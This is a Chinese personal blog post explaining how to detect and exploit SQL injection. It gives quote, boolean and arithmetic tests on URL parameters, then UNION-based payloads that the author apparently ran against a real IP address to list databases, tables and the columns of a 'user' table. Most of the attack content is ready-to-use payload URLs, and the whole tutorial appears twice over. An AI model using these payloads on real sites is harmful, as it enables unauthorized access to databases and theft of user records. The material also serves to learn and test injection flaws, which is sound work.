目录

Fragrans 的个人博客

记录精彩的程序人生

sql注入详解

判断sql注入点

1.单引号判断

http://www.xxx.com/xxx.asp?id=10' 如果出现错误提示,则该网站可能就存在注入漏洞。
2.and判断

http://www.xxx.com/xxx.asp?id=10'and 1=1这个条件永远都是真的,所以当然返回是正常页

http://www.xxx.com/xxx.asp?id=10'and 1=2如果报错那说明存在注入漏洞,还要看报的什么错,不可能报任何错都有注入漏洞的。
3.Or判断(or跟and判断方法不一样的,and是提交返回错误才有注入点,而OR是提交返回正确有注入点)

http://www.xxx.com/xxx.asp?id=10'or 1=1

http://www.xxx.com/xxx.asp?id=10'or 1=2
4.xor判断(xor后面的语句如果是正确的,则返回错误页面,如果是错误,则返回正确页面,说明存在注入点。)

http://www.xxx.com/xxx.asp?id=10'xor 1=1

http://www.xxx.com/xxx.asp?id=10'xor 1=2
5.加减号数字判断(返回的页面和前面的页面相同,加上-1,返回错误页面,则也表示存在注入漏洞.)

http://www.xxx.com/xxx.asp?id=10-0

http://www.xxx.com/xxx.asp?id=10-1

http://www.xxx.com/xxx.asp?id=10+1
6.输入框判断

可以使用特殊符号去判断

#@!$/ ...
登录框注入,使用#,--都无效,但是使用\报错,这时候上sqlmap,发现可以注入。但是如何进行手工注入?

自己的试验结果

1、数据库名

http://123.57.232.25/get/index.php

?id=1' union select 1,group_concat(SCHEMA_NAME),3,4,5 from information_schema.SCHEMATA%23

0
2、获取表名

http://123.57.232.25/get/index.php

?id=1' union select 1,(select group_concat(table_name) ),3,4,5 from information_schema.tables where table_schema='yzm'%23

0
3、获取列名

http://123.57.232.25/get/index.php

?id=1' union select 1,(select group_concat(column_name) ),3,4,5 from information_schema.columns where table_schema='yzm' and table_name='user'%23

判断sql注入点

1.单引号判断

http://www.xxx.com/xxx.asp?id=10' 如果出现错误提示,则该网站可能就存在注入漏洞。
2.and判断

http://www.xxx.com/xxx.asp?id=10'and 1=1这个条件永远都是真的,所以当然返回是正常页

http://www.xxx.com/xxx.asp?id=10'and 1=2如果报错那说明存在注入漏洞,还要看报的什么错,不可能报任何错都有注入漏洞的。
3.Or判断(or跟and判断方法不一样的,and是提交返回错误才有注入点,而OR是提交返回正确有注入点)

http://www.xxx.com/xxx.asp?id=10'or 1=1

http://www.xxx.com/xxx.asp?id=10'or 1=2
4.xor判断(xor后面的语句如果是正确的,则返回错误页面,如果是错误,则返回正确页面,说明存在注入点。)

http://www.xxx.com/xxx.asp?id=10'xor 1=1

http://www.xxx.com/xxx.asp?id=10'xor 1=2
5.加减号数字判断(返回的页面和前面的页面相同,加上-1,返回错误页面,则也表示存在注入漏洞.)

http://www.xxx.com/xxx.asp?id=10-0

http://www.xxx.com/xxx.asp?id=10-1

http://www.xxx.com/xxx.asp?id=10+1
6.输入框判断

可以使用特殊符号去判断

#@!$/ ...
登录框注入,使用#,--都无效,但是使用\报错,这时候上sqlmap,发现可以注入。但是如何进行手工注入?

自己的试验结果

1、数据库名

http://123.57.232.25/get/index.php

?id=1' union select 1,group_concat(SCHEMA_NAME),3,4,5 from information_schema.SCHEMATA%23

0
2、获取表名

http://123.57.232.25/get/index.php

?id=1' union select 1,(select group_concat(table_name) ),3,4,5 from information_schema.tables where table_schema='yzm'%23

0
3、获取列名

http://123.57.232.25/get/index.php

?id=1' union select 1,(select group_concat(column_name) ),3,4,5 from information_schema.columns where table_schema='yzm' and table_name='user'%23

clipboard.png


标题:sql注入详解
作者:Fragrans
地址:http://gsolo.xhtk.top/articles/2021/09/16/1631776614897.html